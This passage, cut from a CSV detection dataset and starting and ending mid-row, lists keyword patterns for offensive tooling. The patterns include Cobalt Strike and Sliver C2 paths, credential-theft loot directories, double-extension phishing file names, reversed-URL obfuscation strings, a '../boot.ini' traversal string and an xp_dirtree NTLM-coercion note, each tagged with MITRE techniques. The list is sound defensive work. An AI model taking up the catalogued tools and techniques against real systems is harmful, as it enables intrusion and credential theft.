T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*.txt.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.txt.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.txt.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.txt.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.txt.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.txt.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.txt.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.txt.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.unconstrained.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*.videos.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.villain_core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*.vpn.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.webmail.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.wiki.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.win10.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*.win7.config.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*.xls.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xls.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xls.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xls.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xls.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xls.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xls.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xls.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xlsx.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xlsx.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xlsx.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xlsx.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xlsx.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xlsx.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xlsx.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xlsx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.xp_dirtree *\*","offensive_tool_keyword","AD exploitation cheat sheet","If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/#kali-installer-images*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/*_priv_esc.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/*SandboxEscapes/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/../../../../../boot.ini*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/.aggressor.prop*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/.cme/cme.conf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/.exegol/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/.local/share/pacu/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/.manspider/logs*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/.manspider/loot*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/.msf4/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/.ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*/.nxc/obfuscated_scripts/*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/.sliver/logs*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/.ssh/RAI.pub*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*//:ptth*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed http://","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*//:sptth*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed https://","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*//crack.sh/get-cracking/*","offensive_tool_keyword","crack.sh","crack.sh THE WORLD???S FASTEST DES CRACKER. Used by attackers to submit passwords to crack","T1110.002 - T1021.002","TA0006 - TA0008","N/A","N/A","Credential Access","https://crack.sh/get-cracking/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*//Lh0St/InJ3C*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*//localhost:1337*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" +"*//RRh0St/InJ3C*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*//shuck.sh*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*//StaticSyscallsDump/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/0d1n.c*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/0d1n_view*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/0tt7/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0004","N/A","N/A","Exploitation tools","https://github.com/0tt7/CVE-2022-23131","1","1","N/A","N/A","1","15","9","2022-02-21T08:25:56Z","2022-02-21T00:51:14Z" +"*/0xdarkvortex-*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" +"*/0xIronGoat/dirty-pipe*","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation 